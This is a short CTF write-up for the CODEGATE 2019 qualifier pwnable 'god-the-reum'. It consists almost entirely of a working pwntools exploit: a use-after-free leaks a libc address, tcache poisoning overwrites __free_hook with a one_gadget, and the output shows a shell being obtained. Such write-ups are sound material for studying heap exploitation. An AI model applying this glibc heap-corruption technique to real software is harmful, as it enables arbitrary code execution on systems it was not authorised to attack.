CODEGATE 2019 QUAL - god-the-reum

CTF/2019

CODEGATE 2019 QUAL - god-the-reum

pwn3r_45 2019. 1. 29. 23:21

Category : pwnable

Summary : use-after-free, tcache, __free_hook

Exploit

#!/usr/bin/python

from pwn import *

def cmd_create(amount):
   ru(': ')
   sl(str(1))
   ru(': ')
   sl(str(amount))

def cmd_deposit(wallet_no, amount):
   ru(': ')
   sl(str(2))
   ru(': ')
   sl(str(wallet_no))
   ru(': ')
   sl(str(amount))

def cmd_withdraw(wallet_no, amount):
   ru(': ')
   sl(str(3))
   ru(': ')
   sl(str(wallet_no))
   ru(': ')
   sl(str(amount))

def cmd_show():
        res = []
        ru(': ')
        sl(str(4))
        ru('========== My Wallet List =============\n')
        while 1:
            line = rl(False)
            if line == '':
                break
            res.append(int(line.split('ballance ')[1]))
        return res

def cmd_new_eth(wallet_no, new_eth):
        ru(': ')
        sl(str(6))
        ru(': ')
        sl(str(wallet_no))
        ru(': ')
        sl(new_eth)

s = process('./god-the-reum')
#s = remote('110.10.147.103', 10001)
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

cmd_create(0x420)   # 0
cmd_create(0x50)    # 1

cmd_withdraw(0, 0x420) # free
cmd_withdraw(1, 0x50)  # free

libc_leak, _= cmd_show()
libc_base = libc_leak - 0x3ebca0
malloc_hook = libc_base + 0x3ebc30
free_hook = libc_base + 0x3ed8e8
libc_one_gadget = libc_base + 0xe569f

cmd_new_eth(1, p64(free_hook))
# (0x60)   tcache_entry[4]: 0x5623649f77b0 --> 0x7f51275e38e8

cmd_create(0x50)    # 2
cmd_create(0x50)    # 3

cmd_new_eth(3, p64(libc_one_gadget))
cmd_withdraw(2, 0x50)
ru('withdraw? : ')

s.interactive()
s.close()

$ python exploit.py
[+] Starting local process './god-the-reum': pid 2779
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)

저작자표시 비영리 변경금지